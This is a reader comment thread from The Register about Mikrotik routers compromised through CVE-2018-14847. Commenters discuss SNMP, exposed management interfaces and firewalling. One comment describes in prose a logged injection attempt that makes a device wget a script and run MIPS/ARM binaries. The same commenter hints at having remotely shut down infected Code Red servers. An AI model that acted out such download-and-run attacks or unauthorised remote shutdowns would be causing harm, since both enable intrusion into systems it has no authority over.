back to article Mikrotik routers pwned en masse, send network data to mysterious box

More than 7,500 Mikrotik routers have been compromised with malware that logs and transmits network traffic data to an unknown control server. This is according to researchers from 360 Netlab, who found the routers had all been taken over via an exploit for CVE-2018-14847, a vulnerability first disclosed in the Vault7 data …

  1. The Vociferous Time Waster

    SNMP

    Many organisations use the same set of SNMP strings across the business. If you manage to compromise it for one device then you stand to compromise it for everything.

  2. bombastic bob Silver badge
    Alert

    Is that the one I noticed this morning?

    Since June there have been a number of requests for '/login.cgi' in my web logs (several hundred) with an obvious code injection exploit in the URL, that wget's a file on a server with a specific IP address (several of these observed, looks like they change periodically) which then loads a binary image for MIPS or ARM processors [as appropriate] into /tmp or one of several other directories that it might be able to download something into...

    in any case the script it first downloads is called 'izuku.sh' . I reported my logs and findings to several ISPs who either hosted the machines doing the request, or WERE the host for the downloading.

    Not sure if this is the same one the article talks about, but the one I saw has been around since June (according to my logs) and always tries to download that script file which then attempts to download the binary into one of several directories, then load/run it. And I think if you disable remote management on your router, this (apparent) virus won't infect it. But it could be a different one, not the one the article is about. I don/t know. So I mention it anyway, just in case. Details are sometimes useful...

    Anyway, if you have a web server, look for access attempts for /login.cgi and you'll probably see it (the one I'm talking about). Again, dunno if it's the same as the one in the article, but is similar, probably.

    (the first log entry is 15-June at 14:36, in case anybody wonders)

    1. defiler

      Re: Is that the one I noticed this morning?

      I'll have to have a look at mine, but the MIPS/ARM binaries will be useless on my CHR.

      Besides, if people are existing the management interface to the outside world, surely they'd firewall it to trusted addresses only, no?

      1. Pascal Monett Silver badge

        Never underestimate a human's ability to not complete an action properly.

        That is a valid remark in all areas of life, but I think it is especially true in IT. Ironically, IT is the only domain where you generally only need a keyboard to do stuff, and even then, people can be too lazy to finish properly.

        1. defiler

          Sometimes you need a mouse. Especially with Windows... Besides that, couldn't agree more. It the difference between the sloppy (who are perceived as getting things done) vs the thorough (who are perceived as slow).

          Anyway. The current RouterOS doesn't seem to have a fix for this bug. So, blocking the management interface from the outside world it is then! But what's wonderful is that CHR reboots so fast. I don't even have to disconnect from my Citrix session.

          1. Unoriginal Handle

            Blocking an external management interface from direct access from the internet is an absolute must. If you have to, VPN access to the box and do it that way. If nothing else the logs on the box fill up with denied SSH requests and the filesystem gets to 100% and the box does funny things up to and including becoming unresponsive...

    2. Version 1.0 Silver badge

      Re: Is that the one I noticed this morning?

      And when you reported it to the ISP's their response was? No need to reply immediately, I'll check this page again in a couple of years to see if you've heard back at all...

      1. bombastic bob Silver badge
        Meh

        Re: Is that the one I noticed this morning?

        unfortunately it seems nothing's been done about the 'izuku.sh' file, though my logs show different IP addresses hosting it now. Yeah, they ignored me. Well that server _IS_ in Poland... they probably can't read or understand the information properly and/or just ignore it because they regularly host criminal services or similar. [I've had 'confirmed kills' before, wtih responses, just not that often - usually it is silently fixed or seems so because the activity stops]. Another possibility is that they leave it on the server to see what IP addresses download it to track the thing. Well I won't interfere with law enforcement if that's the case.

        ( I also posted the actual URL on USENET, and described it even better there, so not like it's invisible any more, and anyone can see it in web server logs )

        Back at the turn o' the century, Code Red lingered for several years after the initial infections started. Someone (allegedly me perhaps?) allegedly had an auto-responder that would allegedly shut down the Code Red infected web server remotely (since it was attempting to spread a virus) via the Code Red back door command/control channel and (allegedly) leave a file on the administrator desktop that said something like "you are an idiot" and explained why the web server was shut down remotely. Both of those factoids should frighten any clueless admin into patching the thing (as it was most likely some old unpatched "oh we have a web server running?" Win2k box in a closet that nobody thought about. But I digress...

  3. John Smith 19 Gold badge
    Unhappy

    When people release a list of developed exploits....

    perhaps it would be a good idea to start developing upgrades to nullify them first?

  4. JohnG

    SNMP

    "....the controller oddly seems to be interested in collecting traffic from the relatively obscure SNMP ports 161 and 162."

    One possibility is that there is some other exploit in the wild, that transfers information using SNMP, on the basis that SNMP packets to and from almost any device would not be considered out of the ordinary and would be unlikely to trigger an IDS/IPS.

  5. Potemkine! Silver badge

    "from the relatively obscure SNMP ports 161 and 162"

    SNMP, obscure? Muahahahaha

    Is there any network supervision system not using SNMP?

  6. marcusbennett

    Vulnerability is overstated

    FFS. This vulnerability was fixed days after it was discovered. We are now 7 dot releases past this fix at 6.42.7 Any decent Network administrator needs to be monitoring and updating the firmware of your products.

    Secondly the exploit relies on remote access to your router. What complete idiot allows this? Never let external internet access to your routers configuration. Are you completely crazy. I include a URL with the rule to prevent WAN access

    https://0day.city/cve-2018-14847.html

    1. Version 1.0 Silver badge

      Re: Vulnerability is overstated

      I always put a firewall between the outside world and the inside world with a basic "drop all" rule "unless" I specifically permit it.

    2. bombastic bob Silver badge
      Devil

      Re: Vulnerability is overstated

      yeah that's definitely different from the one I saw [I followed the rabbit trail to a github site with the python code demonstrating the PoC - it's that old yeah]

    3. Anonymous Coward
      Anonymous Coward

      @marcus - Re: Vulnerability is overstated

      What complete idiot implements remote access in a consumer firewall ?

      1. djack

        Re: @marcus - Vulnerability is overstated

        What complete idiot implements remote access in a consumer firewall ?

        I wouldn't call Mikrotik a consumer firewall. They are squarely aimed at the semi-pro through to carrier market segments.

  7. John Smith 19 Gold badge
    Unhappy

    "What complete idiot implements remote access in a consumer firewall ?"

    Simple.

    1) Some code monkey that cut and pasted the code from stack exchange

    2) Some code monkey that cut and pasted the code from a higher end product and didn't consider if these functions were necessary.

    A code monkey is not a code monkey because their coding skills are s**t.

    They're a code monkey because of what they choose to do about it.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like